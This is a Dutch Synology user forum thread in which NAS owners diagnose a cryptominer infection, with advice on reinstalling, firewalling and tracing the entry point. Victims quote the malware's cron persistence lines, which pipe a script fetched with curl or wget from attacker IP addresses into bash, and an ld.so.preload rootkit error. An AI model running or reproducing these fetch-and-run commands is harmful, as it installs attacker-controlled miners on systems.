Auteur Topic: Process 'sustse' gebruikt volledige processor  (gelezen 3303 keer)

Offline mbomhof

  • Bedankjes
  • -Gegeven: 1
  • -Ontvangen: 4
  • Berichten: 12
Process 'sustse' gebruikt volledige processor
« Gepost op: 13 juni 2019, 17:47:53 »
Hi all,

sinds vanmorgen is het me opgevallen dat een voor mij onbekend proces de processor van mijn DS216+II volledig belast.

  PID USER      PR  NI    VIRT    RES  %CPU %MEM     TIME+ S COMMAND
 1974 root      20   0  262.1m   5.0m 182.2  0.6   0:40.36 S /var/tmp/sustse -c /var/tmp/wc.conf

Het killen van dit proces helpt en de processor wordt weer rustig.
Echter komt dit proces na een paar minuten weer terug.
Het verwijderen van 'sustse' en de config 'wc.conf' heeft geen effect, ook deze komen weer terug.

Een aantal zoekacties op Google levert me dit op, maar ik kan er geen wijs uit worden:
https://gist.github.com/5shekel/b54824ebd6be4bd75442e1480d5f68b2
https://www.digitalocean.com/community/questions/what-is-this-sustes-in-my-process-in-my-cpu-stats

Cronjobs als beschreven kan ik niet terug vinden...

Maar het lijkt er op dat mijn NAS als een of andere miner staat te stampen.
Niet waar ik hem graag voor wil inzetten en zeker niet door mij ingesteld.

Wie kan mij helpen dit proces voor eens en voor altijd te killen...?

  • Mijn Synology: DS216+II
  • HDD's: 2 x WD RED 4TB

Offline mbomhof

  • Bedankjes
  • -Gegeven: 1
  • -Ontvangen: 4
  • Berichten: 12
Re: Process 'sustse' gebruikt volledige processor
« Reactie #1 Gepost op: 13 juni 2019, 18:16:36 »
Aanvulling:

op de locatie /etc/cron.hourly/ vind ik een bestand met de naam 'oanacroner1'.

met daarin de volgende regel:
(curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh

Het verwijderen van dit bestand heeft ook geen effect, komt na een paar minuten terug...
  • Mijn Synology: DS216+II
  • HDD's: 2 x WD RED 4TB

Offline Hofstede

  • MVP
  • *
  • Bedankjes
  • -Gegeven: 8
  • -Ontvangen: 1247
  • Berichten: 5.245
Re: Process 'sustse' gebruikt volledige processor
« Reactie #2 Gepost op: 13 juni 2019, 18:30:16 »
Je NAS is dus geïnfecteerd met malware. Ik zou een backup maken van je data en de NAS volledig opnieuw inrichten.

Offline mbomhof

  • Bedankjes
  • -Gegeven: 1
  • -Ontvangen: 4
  • Berichten: 12
Re: Process 'sustse' gebruikt volledige processor
« Reactie #3 Gepost op: 13 juni 2019, 18:57:18 »
Dank voor de reactie.
Aangezien ik aardig wat draai op mijn NAS en ik er ook behoorlijk wat data op heb staan dat ik niet direct ergens anders kan opslaan, heeft dit natuurlijk niet mijn voorkeur.

Ik heb momenteel het ip adres in het bestand 'oanacroner1' in mijn firewall geblokkeerd en voorlopig zie ik het proces niet terug komen.

Ook heb ik het bestand verwijderd alsmede de bestanden /var/tmp/sustse en /var/tmp/wc.conf.
Ook die komen momenteel niet terug.

Mogelijk hiermee de tijd gewonnen om toch eens verder te zoeken naar een oplossing anders dan opnieuw inrichten...
  • Mijn Synology: DS216+II
  • HDD's: 2 x WD RED 4TB

Offline DSGebruiker

  • Bedankjes
  • -Gegeven: 0
  • -Ontvangen: 23
  • Berichten: 192
Re: Process 'sustse' gebruikt volledige processor
« Reactie #4 Gepost op: 13 juni 2019, 19:31:29 »
Behoorlijk onrustwekkend dat op je NAS er malware is *kunnen* geinstalleerd worden !

Online Briolet

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 119
  • -Ontvangen: 1742
  • Berichten: 11.640
Re: Process 'sustse' gebruikt volledige processor
« Reactie #5 Gepost op: 13 juni 2019, 19:42:42 »
Aangezien ik aardig wat draai op mijn NAS en ik er ook behoorlijk wat data op heb staan dat ik niet direct ergens anders kan opslaan, heeft dit natuurlijk niet mijn voorkeur.

Op zich zal het opnieuw installeren van dsm, van de data op shares afblijven. De kans is dan redelijk dan je de miner kwijt raakt. Maar het blijft vervelend als je niet weet hoe de infectie is gestart. Dan kan het zo weer gebeuren. Staat ssh of telnet open? Dan zou je ook in het "bash_history.log" kunnen zoeken rond het moment van besmetting. (/var/log/bash_history.log)
  • Mijn Synology: DS415+
  • HDD's: 3x 3TB in SHR

Offline mc_

  • Bedankjes
  • -Gegeven: 6
  • -Ontvangen: 6
  • Berichten: 114
Re: Process 'sustse' gebruikt volledige processor
« Reactie #6 Gepost op: 14 juni 2019, 10:08:57 »
[Mod edit: Vanaf hier uit een ander topic toegevoegd omdat dit over hetzelfde probleem blijkt te gaan]

Als ik inlog via SSH (met Putty), en wanneer ik commando's ingeef, krijg ik de volgende foutmelding:

ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.

Als ik naar de betreffende directory ga dan tref ik het bestand libkk.so niet aan.

Af en toe krijg ik ook deze melding:

ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (file too short): ignored.
(net een andere melding)

of deze:

ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.

Ik vermoed dat het te maken heeft met de recente update van PHP5.6 (aangezien dat één van de weinige wijzigingen is geweest), maar wellicht is het ernstiger.

Iemand die bekend is met deze foutmelding?
  • Mijn Synology: DS414
  • HDD's: 4xWD40EFRX

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 991
  • -Ontvangen: 5456
  • Berichten: 32.735
  • Synology is awesome.
    • Synology Support
Re: Process 'sustse' gebruikt volledige processor
« Reactie #7 Gepost op: 14 juni 2019, 10:37:54 »
Verwacht niet dat dit door een update komt dus, het zou wel eens ernstig kunnen zijn, zoals een virus/worm.
Denk dat je even moet Googlen op die fout meldingen.
Ze komen weinig voor.

Overweging: DSM herinstalleren.


CS406     2 x HDS721075KLA330 DSM 2.0-0731       [ARCHIEF OPSLAG]
          ST3750640AS HD753LJ
DS107+    HDS722020ALA330     DSM 3.1-1639       [ARCHIEF OPSLAG]
DS111     WD40EZRZ            DSM 6.1.7-15284-3  [ARCHIEF OPSLAG]
DS411slim Wisselende HD's     DSM 6.2.1-23824-1  [SPEELTJE]
DS411+II  4 x WD20EARX        DSM 6.2.2-24922-4  [BACKUP]
DS413j                        DSM 6.2.2-24922-4  [LEEG]
DS716+II  2 x DT01ACA050      DSM 6.2.2-24922-4  [TEST]
DS918+    4 x HDS724040ALE640 DSM 6.2.2-24922-4  [PROD]
RT2600ac                      SRM 1.2.3-8017-4   [PROD]
MR2200ac                      SRM 1.2.3-8017-4   [PROD]

Online Briolet

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 119
  • -Ontvangen: 1742
  • Berichten: 11.640
Re: Process 'sustse' gebruikt volledige processor
« Reactie #8 Gepost op: 14 juni 2019, 11:32:27 »
Kwaadaardige software rommelt wel vaker met SSH.

Toevallig kwam ik deze vandaag tegen. Daar installeert kwaadaardige software, via een recent lek in een mailserver een ssh key zodat ze via ssh kunnen inloggen met rootrechten. Dat is via een Exim server en niet via postfix die Synology gebruikt voor Mailserver. (Ik weet niet waar mailserver plus op gebaseerd is. (Edit: geen Exim volgens Synology))

In elk geval reden om toch op korte termijn in jouw foutmelding te duiken.
  • Mijn Synology: DS415+
  • HDD's: 3x 3TB in SHR

Offline mc_

  • Bedankjes
  • -Gegeven: 6
  • -Ontvangen: 6
  • Berichten: 114
Re: Process 'sustse' gebruikt volledige processor
« Reactie #9 Gepost op: 14 juni 2019, 13:49:52 »
Dat klinkt allemaal niet hoopgevend. Ik heb geen mailserver draaien, dus ik hoop dat ik die kan wegstrepen.

Saillant detail: AntiVirus is nu al meer dan een dag aan het initialiseren, dus scannen lukt ook niet op dit moment...

Ik kijk even waar Synology Support mee komt.
  • Mijn Synology: DS414
  • HDD's: 4xWD40EFRX

Offline mc_

  • Bedankjes
  • -Gegeven: 6
  • -Ontvangen: 6
  • Berichten: 114
Re: Process 'sustse' gebruikt volledige processor
« Reactie #10 Gepost op: 14 juni 2019, 14:03:35 »
Toch even gaan kijken. Dit stond in /etc/cron.d/root

*/1 * * * * root (curl -s http://107.173.102.59/mr.sh||wget -q -O - http://107.173.102.59/mr.sh)|bash -sh
##

En hetzelfde in een bestand genaamd oanacroner1 in /etc/cron.hourly/

Worm dus. Ik heb deze bestanden verwijderd.

Nog meer acties nodig, voor zover bekend?
  • Mijn Synology: DS414
  • HDD's: 4xWD40EFRX

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 991
  • -Ontvangen: 5456
  • Berichten: 32.735
  • Synology is awesome.
    • Synology Support
Re: Process 'sustse' gebruikt volledige processor
« Reactie #11 Gepost op: 14 juni 2019, 14:27:13 »
Ligt eraan wat mr.sh allemaal doet, dus geen idee.
Maar het SSH inloggen zal nog we fouten opleveren?


CS406     2 x HDS721075KLA330 DSM 2.0-0731       [ARCHIEF OPSLAG]
          ST3750640AS HD753LJ
DS107+    HDS722020ALA330     DSM 3.1-1639       [ARCHIEF OPSLAG]
DS111     WD40EZRZ            DSM 6.1.7-15284-3  [ARCHIEF OPSLAG]
DS411slim Wisselende HD's     DSM 6.2.1-23824-1  [SPEELTJE]
DS411+II  4 x WD20EARX        DSM 6.2.2-24922-4  [BACKUP]
DS413j                        DSM 6.2.2-24922-4  [LEEG]
DS716+II  2 x DT01ACA050      DSM 6.2.2-24922-4  [TEST]
DS918+    4 x HDS724040ALE640 DSM 6.2.2-24922-4  [PROD]
RT2600ac                      SRM 1.2.3-8017-4   [PROD]
MR2200ac                      SRM 1.2.3-8017-4   [PROD]

Offline mc_

  • Bedankjes
  • -Gegeven: 6
  • -Ontvangen: 6
  • Berichten: 114
Re: Process 'sustse' gebruikt volledige processor
« Reactie #12 Gepost op: 14 juni 2019, 14:28:42 »
Ja, nog steeds dezelfde fouten. Maar AntiVirus werkt weer, dus eerst maar even een system scan.
  • Mijn Synology: DS414
  • HDD's: 4xWD40EFRX

Offline MMD

  • MVP
  • *
  • Bedankjes
  • -Gegeven: 103
  • -Ontvangen: 511
  • Berichten: 2.657
  • Everything is electric.
Re: Process 'sustse' gebruikt volledige processor
« Reactie #13 Gepost op: 14 juni 2019, 14:36:58 »
Haal de NAS van het netwerk af en zoek eens op "sustes".

Vraag je af hoe het op je NAS gekomen is.....

Offline mc_

  • Bedankjes
  • -Gegeven: 6
  • -Ontvangen: 6
  • Berichten: 114
Re: Process 'sustse' gebruikt volledige processor
« Reactie #14 Gepost op: 14 juni 2019, 14:45:22 »
Ik heb inmiddels deze gevonden:

https://www.domoticz.com/forum/viewtopic.php?f=6&t=28329

Kan niet anders dan dit het is. Ik heb de meeste voorgestelde stappen gevolgd (niet alles lukt of tref ik aan).

De foutmelding is weg, maar nog even goed napluizen wat er eventueel nog achtergebleven kan zijn.

Iemand toevallig een step-by-step guide liggen hoe Domoticz als niet-root gebruiker te draaien?

EDIT: vraag is natuurlijk hoe Domoticz te draaien zonder root, niet Synology  ::)
  • Mijn Synology: DS414
  • HDD's: 4xWD40EFRX


 

Raid expansion, of wachten op convert process?

Gestart door ZwaaiHaaiBoard NAS hardware vragen

Reacties: 2
Gelezen: 1202
Laatste bericht 19 juli 2011, 21:45:57
door ZwaaiHaai
film gedownload, post-process gedraaid en nu film niet te vinden?

Gestart door SonnemaBoard NZBGet

Reacties: 3
Gelezen: 1400
Laatste bericht 10 april 2013, 18:53:28
door Sonnema
Executing post-process-script nzbToMedia/nzbToSickBeard.py reageert niet meer

Gestart door SanderWBoard NZBGet

Reacties: 2
Gelezen: 1508
Laatste bericht 06 januari 2015, 15:46:46
door SanderW
SABnzbd auto process probleem (rechten?)

Gestart door ProtaxBoard SABnzbd (usenet)

Reacties: 2
Gelezen: 1160
Laatste bericht 12 april 2012, 16:55:14
door Protax
Post-process-script nzbToMedia/nzbToSickBeard.py for .... failed

Gestart door nainggolan86Board NZBGet

Reacties: 3
Gelezen: 2150
Laatste bericht 07 november 2014, 12:40:26
door buzzke
Synology-Forum.nl is een Nederlands gebruikersforum en staat volledig los van het merk Synology. Lees onze privacyverklaring.